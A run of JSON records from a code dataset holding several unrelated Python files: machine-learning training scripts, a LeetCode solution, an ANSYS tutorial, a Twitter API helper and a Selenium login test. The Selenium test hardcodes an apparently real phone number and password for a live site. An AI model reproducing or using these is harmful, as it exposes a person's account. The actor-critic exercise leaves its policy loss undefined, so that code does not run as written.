uids:\n # print(uid)\n # fg = model.getAllFeatures(uid)\n\n # predictor = Predictor(fg.f)\n # print(predictor.getScore())\n # # print(predictor.getReasonCode())\n # print(predictor.getReasonCategory())\n #############################################\n\n # #############################################\n # connection = connect_db(30)\n # sql = '''\n # SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED\n # SELECT UserID\n # FROM Transactions\n # WHERE TransactionTypeID = '1' or TransactionTypeID = '9'\n # GROUP BY UserID\n # HAVING MAX(Date) > '2016-06-18'\n # '''\n # df = pd.read_sql(sql, con=connection)\n # # cursor = connection.cursor(as_dict=True)\n # uids = df['UserID'].values\n # log.info('connected to DB')\n\n # model = MaxAdjustmentModel(connection)\n\n # f = open('activeuser_max_model.csv', 'w')\n # writer = csv.DictWriter(f, fieldnames=['UserId', 'score'])\n # writer.writeheader()\n\n # for uid in uids:\n # print(uid)\n # fg = model.getAllFeatures(str(uid))\n\n # predictor = Predictor(fg.f)\n # writer.writerow({'UserId': uid, 'score': predictor.getScore()})\n\n # f.close()\n # connnection.close()\n # #################################################\n\n # connection = connect_db(30)\n # sql = '''\n # SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED\n # SELECT UserID\n # FROM Transactions\n # WHERE TransactionTypeID = '1' or TransactionTypeID = '9'\n # GROUP BY UserID\n # HAVING MAX(Date) >= '2016-07-01'\n # '''\n # df = pd.read_sql(sql, con=connection)\n # # cursor = connection.cursor(as_dict=True)\n # uids = df['UserID'].values\n # N = df.shape[0]\n # log.info('connected to DB')\n\n # model = MaxAdjustmentModel(connection)\n\n # f = open('activeuser_max_reason_score.csv', 'w')\n # writer = csv.DictWriter(f, fieldnames=['Reason', 'score'])\n # writer.writeheader()\n\n # reasons = dict()\n # for uid in uids:\n # try:\n # print(uid)\n # fg = model.getAllFeatures(str(uid))\n\n # predictor = Predictor(fg.f)\n # reason = predictor.getReasonCategory()\n # if reasons:\n # for res in reasons:\n # reasons[res] += reason[res]/N\n # else:\n # reasons = reason\n # except:\n # pass\n\n # for res in reasons:\n # writer.writerow({'Reason': res, 'score': reasons[res]/N})\n\n # f.close()\n # connnection.close()\n", "sub_path": "src/modeling/model/max_adjustment/MaxAdjustmentModel.py", "file_name": "MaxAdjustmentModel.py", "file_ext": "py", "file_size_in_byte": 21122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 29, "usage_type": "call"}, {"api_name": "ah_db.open_mysql_cursor", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 50, "usage_type": "call"}, {"api_name": "ah_db.open_mysql_cursor", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 55, "usage_type": "call"}, {"api_name": "ah_config.getLogger", "line_number": 133, "usage_type": "call"}, {"api_name": "time.time", "line_number": 134, "usage_type": "call"}, {"api_name": "modeling.feature.feature_activation.ActivationFeature", "line_number": 135, "usage_type": "call"}, {"api_name": "time.time", "line_number": 136, "usage_type": "call"}, {"api_name": "modeling.feature.feature_bank.BankFeature_predict", "line_number": 141, "usage_type": "call"}, {"api_name": "time.time", "line_number": 142, "usage_type": "call"}, {"api_name": "modeling.feature.feature_payroll.Payroll", "line_number": 147, "usage_type": "call"}, {"api_name": "time.time", "line_number": 148, "usage_type": "call"}, {"api_name": "modeling.feature.feature_device.DeviceFeature", "line_number": 153, "usage_type": "call"}, {"api_name": "time.time", "line_number": 154, "usage_type": "call"}, {"api_name": "modeling.feature.feature_user.UserFeature", "line_number": 159, "usage_type": "call"}, {"api_name": "time.time", "line_number": 160, "usage_type": "call"}, {"api_name": "modeling.feature.feature_employment.EmploymentFeature", "line_number": 165, "usage_type": "call"}, {"api_name": "time.time", "line_number": 166, "usage_type": "call"}, {"api_name": "modeling.feature.feature_cs.CSFeature", "line_number": 171, "usage_type": "call"}, {"api_name": "time.time", "line_number": 172, "usage_type": "call"}, {"api_name": "modeling.feature.feature_timesheet.TimeSheetFeature", "line_number": 183, "usage_type": "call"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}, {"api_name": "modeling.feature.feature_new.NewFeature", "line_number": 189, "usage_type": "call"}, {"api_name": "time.time", "line_number": 190, "usage_type": "call"}, {"api_name": "modeling.feature.feature_currentMax.CurrentMaxFeature", "line_number": 195, "usage_type": "call"}, {"api_name": "time.time", "line_number": 196, "usage_type": "call"}, {"api_name": "modeling.feature.feature_season.SeasonFeature", "line_number": 201, "usage_type": "call"}, {"api_name": "time.time", "line_number": 202, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 212, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 212, "usage_type": "name"}, {"api_name": "modeling.feature.feature_generator.FeatureGenerator", "line_number": 215, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 129, "usage_type": "call"}, {"api_name": "ah_db.execute_to_json", "line_number": 252, "usage_type": "call"}, {"api_name": "modeling.feature.feature_activation.Restore", "line_number": 264, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 277, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 288, "usage_type": "call"}, {"api_name": "modeling.feature.feature_activation.ActivationFeature", "line_number": 311, "usage_type": "call"}, {"api_name": "modeling.feature.feature_bank.BankFeature", "line_number": 312, "usage_type": "call"}, {"api_name": "modeling.feature.feature_payroll.Payroll", "line_number": 313, "usage_type": "call"}, {"api_name": "modeling.feature.feature_device.DeviceFeature", "line_number": 314, "usage_type": "call"}, {"api_name": "modeling.feature.feature_user.UserFeature", "line_number": 315, "usage_type": "call"}, {"api_name": "modeling.feature.feature_employment.EmploymentFeature", "line_number": 316, "usage_type": "call"}, {"api_name": "modeling.feature.feature_cs.CSFeature", "line_number": 317, "usage_type": "call"}, {"api_name": "modeling.feature.feature_timesheet.TimeSheetFeature", "line_number": 319, "usage_type": "call"}, {"api_name": "modeling.feature.feature_new.NewFeature", "line_number": 320, "usage_type": "call"}, {"api_name": "modeling.feature.feature_currentMax.CurrentMaxFeature", "line_number": 321, "usage_type": "call"}, {"api_name": "modeling.feature.feature_season.SeasonFeature", "line_number": 322, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 336, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 346, "usage_type": "call"}, {"api_name": "modeling.feature.feature_generator.FeatureGenerator", "line_number": 348, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 369, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 372, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 389, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 391, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 416, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 423, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 430, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 430, "usage_type": "name"}, {"api_name": "ah_config.getLogger", "line_number": 436, "usage_type": "call"}, {"api_name": "ah_config.initialize", "line_number": 439, "usage_type": "call"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 442, "usage_type": "call"}, {"api_name": "modeling.misc.predictor", "line_number": 442, "usage_type": "name"}, {"api_name": "ah_config.initialize", "line_number": 451, "usage_type": "call"}, {"api_name": "os.system", "line_number": 454, "usage_type": "call"}]} +{"seq_id": "136159849", "text": "import os\nimport glob\nimport sys\nimport random\nfrom argparse import ArgumentParser\nimport scipy.io as sio\n\nimport keras\nimport tensorflow as tf\nimport numpy as np\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.models import load_model, Model\nfrom keras.optimizers import Adam\n\nimport network\n# import networks\nimport data_gen\nimport losses\nimport random\n\nsys.path.append('ext/neuron')\nimport metrics\nimport models \nfrom metrics import Dice\n\n# base data directory\nbase_data_dir = 'Your Data directory'\n# I use npz file but change to any other image file format\ntrain_vols_data = glob.glob(base_data_dir + '/*.npz')\ntrain_labels_data = glob.glob(base_data_dir + '/*.npz')\n\n# Sort the volume and labels to match their names\ntrain_vols_data.sort()\ntrain_labels_data.sort()\n \ndef train(save_name, gpu_id, num_data,iters,load,save_iters,num_labels):\n \n # Anatomical Label to evaluate\n labels = sio.loadmat('labels.mat')['labels'][0]\n\n # Patch size and stride \n patch_size = [64,64,64]\n stride = 32\n vol_size = (160, 192, 224)\n\n # Generates the list of random patches for training volume and labels\n\n\n gpu = '/gpu:' + str(gpu_id) \n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(gpu_id)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.allow_soft_placement = True\n set_session(tf.Session(config=config))\n\n model_dir = 'models/' + save_name\n if not os.path.isdir(model_dir):\n os.mkdir(model_dir)\n trf_label_model = data_gen.linear_label_trf(vol_size, indexing='ij')\n trf_vol_model = data_gen.linear_vol_trf(vol_size, indexing='ij')\n resize_model = data_gen.resize_flow(zoom_factor = 16)\n\n with tf.device(gpu):\n # Use dice score for the metric\n # adjust input size based on size of data\n # loss_1 is dice score\n model = network.unet(input_size=(64,64,64,1)) \n model.compile(optimizer=Adam(lr=1e-4), loss='categorical_crossentropy', metrics=[Dice(nb_labels=num_labels).loss])\n\n # load weights of model when continue training\n if load_model is not None:\n print('loading', load_model)\n model.load_weights(load_model)\n\n train_data = data_gen.example_gen(train_vols_data)\n initial_epoch = 0\n for step in range(iters):\n train_vols, train_labels = data_gen.vol_and_label_generator_patch(vol_gen = train_data, \n trf_vol_model=trf_vol_model,\n trf_label_model=trf_label_model,\n resize_model = resize_model, \n patch_size = patch_size,\n labels = labels, \n stride_patch = stride)\n\n train_loss = model.fit(x=train_vols, y=train_labels, epochs=1, batch_size=1, shuffle=True, initial_epoch = initial_epoch,verbose=0)\n\n if(step % save_iters == 0):\n model.save(model_dir + '/' + str(step) + '.h5')\n if not isinstance(train_loss, list):\n train_loss = [train_loss.history['loss'],train_loss.history['loss_1']]\n\n print(step, 1, train_loss)\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"--save_name\", type=str,required=True,dest=\"save_name\", help=\"Name of training model for saving\")\n parser.add_argument(\"--gpu\", type=int,required=True, dest=\"gpu_id\", help=\"gpu id number\")\n parser.add_argument(\"--nb_data\", type=int,required=True, dest=\"num_data\", help=\"number of data will be trained\")\n parser.add_argument(\"--iters\", type=int,required=True, dest=\"iters\", help=\"number of epoch\")\n parser.add_argument(\"--load\", type=str,required=False,dest=\"load_model\", default=None, help=\"model to continue from\")\n parser.add_argument(\"--save_iters\", type=int,required=True, dest=\"save_iters\", help=\"saving iters\")\n parser.add_argument(\"--num_labels\", type=int, default=30, dest=\"num_labels\", help=\"number of interest labels\")\n\n args = parser.parse_args()\n train(**vars(args))\n", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 4333, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 29, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.io.loadmat", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 39, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tensorflow.ConfigProto", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.backend.tensorflow_backend.set_session", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 58, "usage_type": "call"}, {"api_name": "data_gen.linear_label_trf", "line_number": 59, "usage_type": "call"}, {"api_name": "data_gen.linear_vol_trf", "line_number": 60, "usage_type": "call"}, {"api_name": "data_gen.resize_flow", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.device", "line_number": 63, "usage_type": "call"}, {"api_name": "network.unet", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 68, "usage_type": "call"}, {"api_name": "metrics.Dice", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 71, "usage_type": "name"}, {"api_name": "keras.models.load_model", "line_number": 72, "usage_type": "argument"}, {"api_name": "keras.models.load_model", "line_number": 73, "usage_type": "argument"}, {"api_name": "data_gen.example_gen", "line_number": 75, "usage_type": "call"}, {"api_name": "data_gen.vol_and_label_generator_patch", "line_number": 78, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "468414841", "text": "\"\"\"\nYou are a professional robber planning to rob houses along a street.\nEach house has a certain amount of money stashed,\nthe only constraint stopping you from robbing each of them is\nthat adjacent houses have security system connected\nand it will automatically contact the police\nif two adjacent houses were broken into on the same night.\n\nGiven a list of non-negative integers representing\nthe amount of money of each house,\ndetermine the maximum amount of money\nyou can rob tonight without alerting the police.\n\"\"\"\n\n\nclass Solution:\n # @param num, a list of integer\n # @return an integer\n def rob(self, num):\n \"\"\" Let Sn is the amount that the number n house had been robbed,\n Un is the amount that the number n house hadn't been robbed\n Vn is the amount that the number n house stashed\n So Sn = Un-1 + Vn, Un = Max(Sn-1, Un-1)\n Result = Max(Sn, Un) = Max(Un-1+Vn, Sn-1)\n and S0 = 0, U0 = 0\n \"\"\"\n unrobbed = robbed = 0\n for i in num:\n robbed, unrobbed = unrobbed + i, max(robbed, unrobbed)\n\n return max(robbed, unrobbed)\n\n\nif __name__ == '__main__':\n from utils import do_test\n t = do_test.MyTest(\n Solution().rob,\n [([1, 2, 3, 4, 5], 9)]\n )\n print(t.run())", "sub_path": "leetcode/algorithms/house-robber.py", "file_name": "house-robber.py", "file_ext": "py", "file_size_in_byte": 1311, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "utils.do_test.MyTest", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.do_test", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "365897706", "text": "\"\"\"\nAPDLMath Sparse Matrices and SciPy Sparse Matrices\n-------------------------------------------------------------------\n\nThis tutorial will show how to get APDLMath sparse matrices from FULL\nfiles to SciPy Sparse Matrices.\n\n\n\"\"\"\nimport matplotlib.pylab as plt\n\nfrom ansys.mapdl.core import launch_mapdl\nfrom ansys.mapdl.core.examples import vmfiles\n\nmapdl = launch_mapdl()\nmm = mapdl.math\n\n\n################################################################################\n# Load and solve verification manual example 153. Then load the\n# stiffness matrix into APDLmath.\nout = mapdl.input(vmfiles[\"vm153\"])\nk = mm.stiff(fname=\"PRSMEMB.full\")\nk\n\n################################################################################\n# Copy this APDLMath Sparse Matrix to a SciPy CSR matrix and plot the\n# graph of the sparse matrix\npk = k.asarray()\nplt.spy(pk)\n\n\n################################################################################\n# You can access the 3 vectors that describe this sparse matrix with.\n#\n# - ``pk.data``\n# - ``pk.indices``\n# - ``pk.indptr``\n#\n# See the ``scipy`` documentation of the csr matrix at `scipy.sparse.csr_matrix `_ for additional details.\n\nprint(pk.data[:10])\nprint(pk.indices[:10])\nprint(pk.indptr[:10])\n\n\n################################################################################\n# ### Create a APDLMath Sparse Matrix from a SciPy Sparse CSR Matrix\n#\n# Here, we transfer the ``scipy`` CSR matrix back to MAPDL. While\n# this example uses a matrix that was originally within MAPDL, you can\n# load any CSR matrix to MAPDL.\n\nmy_mat = mm.matrix(pk, \"my_mat\", triu=True)\nmy_mat\n\n################################################################################\n# Check initial matrix ``k`` and ``my_mat`` are exactly the sames:\n# We compute the norm of the difference, should be zero\n\nmsub = k - my_mat\nmm.norm(msub)\n\n\n################################################################################\n# CSR Representation in MAPDL\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# Printing the list of objects in the MAPDL space, we find:\n#\n# - 2 SMAT objects, corresponding to the ``k``, ``MSub`` matrices,\n# - with encrypted names\n# - The ``my_mat`` SMAT object. Its size is zero, because the 3\n# - vectors are stored separately\n# - the 3 vectors of the CSR my_mat structure: ``MY_MAT_PTR``, ``MY_MAT_IND``\n# - and ``MY_MAT_DATA``\n\nmm.status()\n\n\n################################################################################\n# MAPDL Python Matrix Correspondence\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# To determine which MAPDL object corresponds to which Python object,\n# access the id property of the Python object.\n\nprint(\"name(k)=\" + k.id)\nprint(\"name(my_mat)=\" + my_mat.id)\nprint(\"name(msub)=\" + msub.id)\n\n\n###############################################################################\n# Stop mapdl\n# ~~~~~~~~~~\n#\nmapdl.exit()\n", "sub_path": "examples/01-apdlmath-examples/scipy_sparse_matrix.py", "file_name": "scipy_sparse_matrix.py", "file_ext": "py", "file_size_in_byte": 2940, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "ansys.mapdl.core.launch_mapdl", "line_number": 15, "usage_type": "call"}, {"api_name": "ansys.mapdl.core.examples.vmfiles", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pylab.spy", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "243855101", "text": "import configparser\nimport twitter\nfrom os import path\n\nROOT = path.dirname(path.realpath(__file__))\n\nconfig = configparser.ConfigParser()\nconfig.read(path.join(ROOT, 'twitter_auth.ini'))\n\nmy_consumer_key=config['DEFAULT']['my_consumer_key']\nmy_consumer_secret=config['DEFAULT']['my_consumer_secret']\nmy_access_token_key=config['DEFAULT']['my_access_token_key']\nmy_access_token_secret=config['DEFAULT']['my_access_token_secret']\n\ndef getApi():\n return twitter.Api(consumer_key=my_consumer_key, consumer_secret=my_consumer_secret, access_token_key=my_access_token_key, access_token_secret=my_access_token_secret, tweet_mode='extended')\n\n", "sub_path": "twitterGetApi.py", "file_name": "twitterGetApi.py", "file_ext": "py", "file_size_in_byte": 639, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "name"}, {"api_name": "os.path.realpath", "line_number": 5, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "name"}, {"api_name": "twitter.Api", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "56010768", "text": "# coding:UTF-8\nimport time\nimport unittest\nfrom time import sleep\n\nimport selenium\nfrom selenium import webdriver\n\n\nclass TestLogin(unittest.TestCase):\n\n # init\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.driver.get(\"https://xdclass.net/#/index\")\n self.driver.maximize_window()\n self.driver.implicitly_wait(20)\n self.driver.find_element_by_css_selector(\n \"#app > div > div.get_main > div > div.closed\"\n ).click()\n\n #\n def tearDown(self) -> None:\n sleep(2)\n self.driver.quit()\n\n # 定义登录测试方法 验证码为空\n def testLogin(self):\n driver = self.driver\n driver.find_element_by_css_selector(\n \"#app > div > div:nth-child(1) > div.header > div.r_userinfo.f_r > div.login > span:nth-child(2)\"\n ).click()\n\n driver.find_element_by_css_selector(\n \"#app > div > div:nth-child(1) > div.header > div.main > div.login > div > div.mobienum > input[type=text]\"\n ).send_keys(\"15535160433\")\n sleep(2)\n\n driver.find_element_by_css_selector(\n \"#app > div > div:nth-child(1) > div.header > div.main > div.login > div > div.psw > input[type=password]\"\n ).send_keys(\"li796093\")\n sleep(2)\n\n driver.find_element_by_css_selector(\n \"#app > div > div:nth-child(1) > div.header > div.main > div.login > div > div.login_btn > button\"\n ).click()\n sleep(5)\n\n driver.get_screenshot_as_file(\"sc_img/{}.png\".format(\n time.strftime(\"%Y_%m_%d_%H_%M_%S\")))\n\n if __name__ == '__main__':\n print(\"\")\n", "sub_path": "myHTML_report/testCase/TestCaseLogin.py", "file_name": "TestCaseLogin.py", "file_ext": "py", "file_size_in_byte": 1630, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 14, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 37, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "633714578", "text": "import numpy as np\nimport torch as th\nfrom torch import nn\nfrom storage import Buffer\nfrom torch.distributions import Uniform\nfrom copy import deepcopy\n\nclass ActorCritic:\n\n def __init__(\n self,\n policy,\n qf,\n env,\n discount,\n qf_optimiser,\n policy_optimiser,\n max_evaluation_episode_length=200,\n num_evaluation_episodes=5,\n num_training_episode_steps=1000,\n batch_size=128,\n buffer_size = 10000,\n eval_deterministic = True,\n training_on_policy = False,\n vf=None,\n vf_optimiser=None\n ):\n\n self.policy = policy\n self.qf = qf\n self.vf = vf\n self.target_vf = deepcopy(vf)\n self.tau = 1e-2\n self.vf_optimiser = vf_optimiser\n self.qf_optimiser = qf_optimiser\n self.policy_optimiser = policy_optimiser\n self.env = env\n self.discount = discount\n self.batch_size = batch_size\n self.max_evaluation_episode_length = max_evaluation_episode_length\n self.num_evaluation_episodes = num_evaluation_episodes\n self.num_training_episode_steps = num_training_episode_steps\n self.training_on_policy = training_on_policy\n self.buffer = Buffer(buffer_size=buffer_size)\n self.loss = nn.MSELoss()\n self.pretraining_policy = Uniform(high=th.Tensor([policy.max_action]), low=th.Tensor([policy.min_action]))\n self.eval_deterministic = eval_deterministic\n\n self.R_av = None\n self.R_tot = 0\n\n def reset(self):\n self.state = th.from_numpy(self.env.reset()).float()\n\n def evaluate(self, render=False):\n\n total_return = 0\n\n for _ in range(self.num_evaluation_episodes):\n state = th.from_numpy(self.env.reset()).float()\n episode_return = 0\n\n for _ in range(self.max_evaluation_episode_length):\n action = self.policy.get_action(state, self.eval_deterministic)\n action = np.array([action.item()])\n\n if render:\n self.env.render()\n state, reward, terminal, _ = self.env.step(action)\n state = th.from_numpy(state).float()\n\n episode_return += reward\n\n if terminal:\n break\n\n total_return += episode_return\n\n self.average_return = total_return/self.num_evaluation_episodes\n\n def sample_episode(self, exploration_mode=False):\n\n self.reset()\n state = self.state\n\n for _ in range(self.num_training_episode_steps):\n\n if exploration_mode:\n action = self.pretraining_policy.sample()\n else:\n action = self.policy.get_action(state)\n next_state, reward, terminal, _ = self.env.step(action.numpy())\n next_state = th.from_numpy(next_state).float()\n reward = th.Tensor([reward])\n terminal = th.Tensor([terminal])\n\n self.buffer.add(state=state,\n action=action,\n reward=reward,\n next_state=next_state,\n terminal=terminal)\n\n state = next_state\n if terminal:\n self.reset()\n state = self.state\n\n def env_step(self):\n\n state = self.state\n action = self.policy.get_action(state)\n next_state, reward, terminal, _ = self.env.step(action.numpy())\n next_state = th.from_numpy(next_state).float()\n reward = th.Tensor([reward])\n terminal = th.Tensor([terminal])\n\n self.buffer.add(state=state,\n action=action,\n reward=reward,\n next_state=next_state,\n terminal=terminal)\n\n self.state = next_state\n\n def train_score(self):\n if self.training_on_policy:\n batch = self.buffer.whole_batch()\n self.buffer.clear()\n else:\n batch = self.buffer.random_batch(self.batch_size)\n states = batch['states']\n actions = batch['actions']\n rewards = batch['rewards']\n next_states = batch['next_states']\n terminals = batch['terminals']\n\n new_actions, log_pis = self.policy.get_action_and_log_prob(states)\n values = self.vf(states)\n state_actions = th.cat((states, actions), 1)\n q_values = self.qf(state_actions)\n next_values = self.target_vf(next_states)\n new_state_actions = th.cat((states, new_actions), 1)\n new_q_values = self.qf(new_state_actions)\n\n \"\"\"\n Value (Critic) Losses:\n \"\"\"\n\n v_targets = new_q_values\n vf_loss = (v_targets.detach() - values).pow(2).mean()\n\n q_targets = rewards + self.discount * (1 - terminals) * next_values\n qf_loss = (q_targets.detach() - q_values).pow(2).mean()\n\n\n \"\"\"\n Policy (Actor) Losses: TO COMPLETE IN EXERCISE II.2b\n \"\"\"\n # policy_loss =\n\n \"\"\"\n Gradient Updates\n \"\"\"\n self.qf_optimiser.zero_grad()\n qf_loss.backward()\n self.qf_optimiser.step()\n\n self.vf_optimiser.zero_grad()\n vf_loss.backward()\n self.vf_optimiser.step()\n\n self.policy_optimiser.zero_grad()\n # policy_loss.backward()\n self.policy_optimiser.step()\n\n self.soft_update()\n\n def train_reparametrisation(self):\n\n if self.training_on_policy:\n batch = self.buffer.whole_batch()\n self.buffer.clear()\n else:\n batch = self.buffer.random_batch(self.batch_size)\n states = batch['states']\n actions = batch['actions']\n rewards = batch['rewards']\n next_states = batch['next_states']\n terminals = batch['terminals']\n\n state_actions = th.cat((states, actions), 1)\n q_pred = self.qf(state_actions)\n v_pred = self.vf(states)\n new_actions, log_pis = self.policy.r_sample(states)\n\n \"\"\"\n Value (Critic) Losses:\n \"\"\"\n target_v_values = self.target_vf(next_states)\n q_target = rewards + (1. - terminals) * self.discount * target_v_values\n qf_loss = self.loss(q_pred, q_target.detach())\n\n new_state_actions = th.cat((states, new_actions), 1)\n q_new_actions = self.qf(new_state_actions)\n v_target = q_new_actions\n vf_loss = self.loss(v_pred, v_target.detach())\n\n \"\"\"\n Policy (Actor) Loss: TO COMPLETE IN EXERCISE II.3c \n \"\"\"\n # policy_loss =\n\n\n \"\"\"\n Gradient Updates\n \"\"\"\n self.qf_optimiser.zero_grad()\n qf_loss.backward()\n self.qf_optimiser.step()\n\n self.vf_optimiser.zero_grad()\n vf_loss.backward()\n self.vf_optimiser.step()\n\n self.policy_optimiser.zero_grad()\n policy_loss.backward()\n self.policy_optimiser.step()\n\n self.soft_update()\n\n\n def soft_update(self):\n for target_param, param in zip(self.target_vf.parameters(), self.vf.parameters()):\n target_param.data.copy_(\n target_param.data * (1.0 - self.tau) + param.data * self.tau\n )", "sub_path": "algorithms_orig.py", "file_name": "algorithms_orig.py", "file_ext": "py", "file_size_in_byte": 7277, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "storage.Buffer", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.distributions.Uniform", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 203, "usage_type": "call"}]} +{"seq_id": "154423320", "text": "import numpy\nimport pytest\n\nimport optimesh\nfrom meshes import pacman, simple1\n\n\n@pytest.mark.parametrize(\n \"mesh, ref1, ref2, refi\",\n [\n (simple1, 5.0, 2.1213203435596424, 1.0),\n (pacman, 1919.3310978354305, 75.03937100433645, 5.0),\n ],\n)\ndef test_fixed_point(mesh, ref1, ref2, refi):\n X, cells = mesh()\n\n X, cells = optimesh.laplace.fixed_point(X, cells, 0.0, 10)\n\n # Test if we're dealing with the mesh we expect.\n nc = X.flatten()\n norm1 = numpy.linalg.norm(nc, ord=1)\n norm2 = numpy.linalg.norm(nc, ord=2)\n normi = numpy.linalg.norm(nc, ord=numpy.inf)\n\n tol = 1.0e-12\n assert abs(norm1 - ref1) < tol * ref1\n assert abs(norm2 - ref2) < tol * ref2\n assert abs(normi - refi) < tol * refi\n return\n", "sub_path": "test/test_laplace.py", "file_name": "test_laplace.py", "file_ext": "py", "file_size_in_byte": 757, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "optimesh.laplace.fixed_point", "line_number": 18, "usage_type": "call"}, {"api_name": "optimesh.laplace", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 24, "usage_type": "attribute"}, 